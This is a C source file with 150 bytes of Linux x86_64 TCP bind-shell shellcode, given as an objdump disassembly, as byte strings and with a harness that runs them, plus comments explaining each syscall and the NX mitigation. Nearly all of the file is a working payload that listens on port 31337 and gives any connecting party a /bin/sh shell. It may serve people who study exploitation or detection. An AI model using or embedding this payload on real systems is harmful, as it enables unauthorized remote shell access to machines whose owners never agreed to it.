/*
|
|
Title : tcpbindshell (150 bytes)
|
|
Date : 04 October 2013
|
|
Author : Russell Willis <codinguy@gmail.com>
|
|
Tested on: Linux/x86_64 (SMP Debian 3.2.46-1+deb7u1 x86_64 GNU/Linux)
|
|
|
|
$ objdump -D tcpbindshell -M intel
|
|
tcpbindshell: file format elf64-x86-64
|
|
Disassembly of section .text:
|
|
|
|
0000000000400080 <_start>:
|
|
400080: 48 31 c0 xor rax,rax
|
|
400083: 48 31 ff xor rdi,rdi
|
|
400086: 48 31 f6 xor rsi,rsi
|
|
400089: 48 31 d2 xor rdx,rdx
|
|
40008c: 4d 31 c0 xor r8,r8
|
|
40008f: 6a 02 push 0x2
|
|
400091: 5f pop rdi
|
|
400092: 6a 01 push 0x1
|
|
400094: 5e pop rsi
|
|
400095: 6a 06 push 0x6
|
|
400097: 5a pop rdx
|
|
400098: 6a 29 push 0x29
|
|
40009a: 58 pop rax
|
|
40009b: 0f 05 syscall
|
|
40009d: 49 89 c0 mov r8,rax
|
|
4000a0: 4d 31 d2 xor r10,r10
|
|
4000a3: 41 52 push r10
|
|
4000a5: 41 52 push r10
|
|
4000a7: c6 04 24 02 mov BYTE PTR [rsp],0x2
|
|
4000ab: 66 c7 44 24 02 7a 69 mov WORD PTR [rsp+0x2],0x697a
|
|
4000b2: 48 89 e6 mov rsi,rsp
|
|
4000b5: 41 50 push r8
|
|
4000b7: 5f pop rdi
|
|
4000b8: 6a 10 push 0x10
|
|
4000ba: 5a pop rdx
|
|
4000bb: 6a 31 push 0x31
|
|
4000bd: 58 pop rax
|
|
4000be: 0f 05 syscall
|
|
4000c0: 41 50 push r8
|
|
4000c2: 5f pop rdi
|
|
4000c3: 6a 01 push 0x1
|
|
4000c5: 5e pop rsi
|
|
4000c6: 6a 32 push 0x32
|
|
4000c8: 58 pop rax
|
|
4000c9: 0f 05 syscall
|
|
4000cb: 48 89 e6 mov rsi,rsp
|
|
4000ce: 48 31 c9 xor rcx,rcx
|
|
4000d1: b1 10 mov cl,0x10
|
|
4000d3: 51 push rcx
|
|
4000d4: 48 89 e2 mov rdx,rsp
|
|
4000d7: 41 50 push r8
|
|
4000d9: 5f pop rdi
|
|
4000da: 6a 2b push 0x2b
|
|
4000dc: 58 pop rax
|
|
4000dd: 0f 05 syscall
|
|
4000df: 59 pop rcx
|
|
4000e0: 4d 31 c9 xor r9,r9
|
|
4000e3: 49 89 c1 mov r9,rax
|
|
4000e6: 4c 89 cf mov rdi,r9
|
|
4000e9: 48 31 f6 xor rsi,rsi
|
|
4000ec: 6a 03 push 0x3
|
|
4000ee: 5e pop rsi
|
|
00000000004000ef <doop>:
|
|
4000ef: 48 ff ce dec rsi
|
|
4000f2: 6a 21 push 0x21
|
|
4000f4: 58 pop rax
|
|
4000f5: 0f 05 syscall
|
|
4000f7: 75 f6 jne 4000ef <doop>
|
|
4000f9: 48 31 ff xor rdi,rdi
|
|
4000fc: 57 push rdi
|
|
4000fd: 57 push rdi
|
|
4000fe: 5e pop rsi
|
|
4000ff: 5a pop rdx
|
|
400100: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f
|
|
400107: 2f 73 68
|
|
40010a: 48 c1 ef 08 shr rdi,0x8
|
|
40010e: 57 push rdi
|
|
40010f: 54 push rsp
|
|
400110: 5f pop rdi
|
|
400111: 6a 3b push 0x3b
|
|
400113: 58 pop rax
|
|
400114: 0f 05 syscall
|
|
|
|
Code is not optimal; this is left as an exercise to the reader ;^)
|
|
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
|
|
/* Listening port as a 16-bit big-endian (network byte order) value:
 * 0x7a69 == 31337.  The two bytes are spliced into the payload as the
 * immediate of the `mov WORD PTR [rsp+0x2],0x697a` in the disassembly
 * above, i.e. the sin_port field of the sockaddr_in built on the stack
 * (the rest of that struct is zero, so sin_addr is INADDR_ANY). */
#define PORT "\x7a\x69" /* 31337 */

/* The 150 payload bytes from the disassembly above, kept as a string
 * literal (so sizeof(code) is 151 and main() subtracts the trailing NUL).
 * Being a non-const initialized global, this is ordinary writable data,
 * not a code section.  Per the listing the sequence is:
 * socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) -> bind(port PORT, any addr)
 * -> listen(backlog 1) -> accept -> dup2 of the accepted fd onto 2, 1, 0
 * -> execve("//bin/sh").  From a monitoring standpoint the observable is
 * a process that opens a TCP listener on 31337 and then execs a shell. */
unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
"\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02"
PORT"\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05"
"\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31"
"\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59"
"\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48"
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
"\x5f\x6a\x3b\x58\x0f\x05";
|
|
|
|
/*
 * Test harness: prints the payload length, then transfers control to the
 * bytes in `code`.
 *
 * The conversion of an object pointer (`code`) to a function pointer is
 * not defined by ISO C; it relies on a widespread extension.  Whether the
 * call actually executes depends on the page holding `code` being
 * executable.  Under a W^X / NX policy a writable data page is not, and
 * the indirect call faults there -- that is the mitigation doing its job.
 * The "Shellcode Length" line reports sizeof(code) minus the literal's
 * terminating NUL (150 for the payload above).
 */
int
main(void)
{
	/* sizeof includes the terminating NUL of the string literal; -1 drops it. */
	printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
	/* Object -> function pointer cast; the old-style `()` declarator
	 * declares an unspecified parameter list. */
	int (*ret)() = (int(*)())code;
	/* If the payload reaches its execve successfully the process image is
	 * replaced, so this call normally does not return. */
	ret();
	return 0;
}